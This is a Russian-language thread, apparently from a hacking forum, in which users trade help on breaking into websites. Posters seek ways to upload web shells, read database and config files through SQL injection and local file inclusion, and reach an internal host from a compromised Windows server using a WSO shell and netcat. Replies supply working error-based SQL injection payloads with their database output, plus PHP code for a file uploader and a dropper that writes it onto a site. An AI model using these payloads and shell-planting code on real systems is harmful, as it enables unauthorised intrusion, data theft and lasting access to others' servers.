Ваши вопросы по уязвимостям.

немогу залить шелл через админку. Просто тупо не через что не заливается, да и путей залития практически нет, только баннерная реклама. Есть еще какие либо способы заливки шелла, и получения доступа к БД?

 

Есть. Купить мозг и назвать хотя бы ГДЕ ты пытаешься это сделать или сразу дать ссылку

 

скипио показал пример с двойным запросом. это типа когда одно из полей результата первого запроса идёт во второй запрос.
у тебя ошибку выдает если в какое-нибудь поле подставить 0x27 = ковычка ?

 

Ты посмотри внимательно код - там двойной запрос, точнее два запроса, а у тебя скорее всего один, как и во всех скулях...

 

Нет.

 

проверить, нет ли там LFI одновременно со скулей. Если нет - тупо читать конфиги, дальше по ситуации

 

Кто тебе сказал, что через LOAD_FILE нельзя читать PHP-код?

Это не является способом обхода кавычек

 

такие вопросы голосованием не решаются
не выполнится, только разве что скрипт зачем-нибудь поставит результаты запроса в eval. Полагаю, такая ситуация очень маловероятна

 

мне кажется ты путаешь читалку через sql-inj и php инклуд.
в твоем случае возможно есть чтение файлов через load_file(hex/char значение пути и имени). Но в этом случае ты читаешь файл, а не вынуждаешь его выполниться как php-код.
почитай про load_file

ps
Пример чтения /etc/passwd:

 

Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.

 

когда я говорил про LFI, то не имел в виду load_file, если вы не встречали таких скулей, где одновременно и скуля и LFI - то еще встретите. Просто надо внимательно читать ошибки, которые выводятся на экран.

 

Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь.

 

а вот и принтабельное поле 2 3 ))

тока дальше не подчиняется ((

 

люди,знаю, что много раз обсуждалось, но все же, на фтп на все папки стоят права 755,а на файлы 644, ничего не могу залить. Можно ли как то обойти эту проблему?
P.S. Если есть мануалы, с радостью почитаю

 

Помогите пожалуста! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??

 

Мне кажется Матня имел ввиду просто аплоадер файлов

Code:

<form enctype=multipart/form-data  method=post>
<input name=x type=file><input type=submit></form>
<?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>

Ну а код, который этот аплоадер создает:

Code:

<?php $f = fopen('up.php','w');fwrite($f,'<form enctype=multipart/form-data  method=post><input name=x type=file><input type=submit></form><?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>');fclose($f); ?>

 

http://forum.antichat.ru/showthread.php?t=107655

 

в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.

 

Да, скуля, в строку поиска вводим:

Code:

%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

Получаем:

MySQL Error: 1060 (Duplicate column name '5.0.51a')

 

2 $n@ke

Code:

xek%')/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b#

Duplicate column name 'CHARACTER_SETS'